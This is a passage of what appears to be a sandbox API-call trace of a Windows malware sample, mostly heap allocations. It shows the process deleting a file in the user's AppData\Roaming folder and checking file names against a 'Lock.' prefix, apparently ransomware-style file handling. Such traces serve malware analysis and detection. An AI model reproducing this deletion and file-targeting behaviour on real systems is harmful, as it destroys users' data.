dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0198.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0198.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.277] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0198.277] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0198.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.278] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0198.279] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/e-h1xk7cgYR.swf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf", lpFilePart=0x8bedfc*="e-h1xk7cgYR.swf") returned 0x3d [0198.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.279] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e-h1xk7cgyr.swf")) returned 0x2020 [0198.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9efa880, ftCreationTime.dwHighDateTime=0x1d4cff9, ftLastAccessTime.dwLowDateTime=0x2f665040, ftLastAccessTime.dwHighDateTime=0x1d4cf98, ftLastWriteTime.dwLowDateTime=0x2f665040, ftLastWriteTime.dwHighDateTime=0x1d4cf98, nFileSizeHigh=0x0, nFileSizeLow=0x77a7, dwReserved0=0xa02, dwReserved1=0x4, cFileName="e-h1xk7cgYR.swf", cAlternateFileName="E-H1XK~1.SWF")) returned 0xaa58e0 [0198.279] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e-h1xk7cgyr.swf")) returned 1 [0198.281] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9efa880, ftCreationTime.dwHighDateTime=0x1d4cff9, ftLastAccessTime.dwLowDateTime=0x2f665040, ftLastAccessTime.dwHighDateTime=0x1d4cf98, ftLastWriteTime.dwLowDateTime=0x2f665040, ftLastWriteTime.dwHighDateTime=0x1d4cf98, nFileSizeHigh=0x0, nFileSizeLow=0x77a7, dwReserved0=0xa02, dwReserved1=0x4, cFileName="e-h1xk7cgYR.swf", cAlternateFileName="E-H1XK~1.SWF")) returned 0 [0198.281] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0198.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.281] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0198.282] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.282] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0198.284] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/e-h1xk7cgYR.swf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf", lpFilePart=0x8bf658*="e-h1xk7cgYR.swf") returned 0x3d [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.284] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\e-h1xk7cgYR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e-h1xk7cgyr.swf")) returned 0xffffffff [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0198.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0198.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0198.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="enrHxcENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nrHxcENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHxcENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HxcENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xcENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ENdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NdtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dtYHa.rtf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYHa.rtf", cchCount1=5, 